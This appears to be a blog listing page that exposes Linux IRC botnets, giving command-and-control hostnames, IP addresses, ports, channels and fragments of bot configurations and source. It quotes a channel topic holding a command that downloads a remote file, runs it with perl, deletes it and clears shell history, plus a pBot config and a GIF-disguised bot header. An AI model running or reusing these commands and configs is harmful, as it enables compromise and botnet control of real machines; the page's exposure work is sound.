Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine. $server = ‘comment.dyn.mk’ unless $server; my $port = ‘6667’; [11:00] * Now talking in #kill (around 100 bots inside) [11:00] * Topic is ‘wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c ‘ [11:00] * Set by anonplus on Thu Jan 07 17:06:34 URead more...
Linux Botnet Hosted In blackunix.us
This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV Now talking in #botnets Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ] Topic By : [ uyap ] Modes On : [ #botnets ] [ +smntrMuk fcuked ] The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log
ircd.freenetwork.com.ar (Linux botnet hosted in Korea, Republic Of Seoul Korea Internet Data Center)
Botnet found by X. ircd.freenetwork.com.ar nick: addr: ircd.freenetwork.com.ar ip: 222.231.10.81 Longip: 3739683409 Server: ircd.freenetwork.com.ar:6667 Channels: #org,#rpl,#root,#viar Now 15 talking in #org Topic On : [ #org ] [ Don’t flood fuck || Register your nick… !!! [ SCAN ON ] || if you want to donate server,,please pm admin.. ] Hosting infos: http://whois.domaintools.com/222.231.10.81
bot.blackunix.us(Linux bots hosted in France Roubaix Ovh Systems)
Found by Yewnix. Resolved : [bot.blackunix.us] To [94.23.89.246]Resolved : [bot.blackunix.us] To [217.29.115.1]Resolved : [bot.blackunix.us] To [91.151.85.31]Resolved : [bot.blackunix.us] To [59.167.240.231]Resolved : [bot.blackunix.us] To [58.180.42.200]Resolved : [bot.blackunix.us] To [64.31.27.18] class pBot { var $config = array("server"=>"bot.blackunix.us", "port"=>"20", "pass"=>"", "prefix"=>"Blood", "maxrand"=>"15", "key"=>"none", "chan"=>"#metri", "modes"=>"+ps", "chan2"=>"#metri", "password"=>"crack", "trigger"=>".", "hostauth"=>"bogel.us" // * for any hostname (remember: /setvhost pasukan.ddos.reload-x.us) HostingRead more...
203.81.204.105(14k Linux bots hosted in Pakistan Karachi South Cmbroadband Noc)
Big heckers big net. Thnx to loadx and Yewnix for the ownage and exposing them. Everything is inside the config file: /* Type of comments */ #Comment type 1 (Shell type) // Comment type 2(C++ style) /* Comment type 3 (C Style) */ #those lines are ignored by the ircd. loadmodule "src/modules/commands.so"; #loadmodule "cloak.dll"; #includeRead more...
37.221.160.132 (Kaiten irc botnet hosted by voxility.net)
Server: 37.221.160.132 Port: 443 Channel: #yodawg Channel password: lol.WH #yodawg 58 [+smnu] yo dawg i herd u like backdoors so we put a backdoor in ur backdoor so u can get owned while u own Check his server usage here: hxxp://fkn.ddos.cat/p.php Another one from x00 http://pastebin.com/fgjJGFxt Hosting infos: http://whois.domaintools.com/37.221.160.132
208.89.209.54 (Irc botnet hosted by virpus.com)
Server: 208.89.209.54 Port: 6667 Current global users 77, max 695 Channels: #goon 3 #aryan 39 #OFFLINE#flood 1 ##yBz## 15 ##Offline## 19 Aryan bots: Channel: #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel: ##Offline## Channel: ##yBz## Hosting infos: http://whois.domaintools.com/208.89.209.54
irc.benjol.tk(Linux bots hosted in France Roubaix Ovh Systems)
Resolved : [irc.benjol.tk] To [37.59.42.103]Resolved : [irc.benjol.tk] To [46.45.183.189] GIF89a ? ????ÿÿÿ!ù ????,???? ? ?? D ?;?<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to>Read more...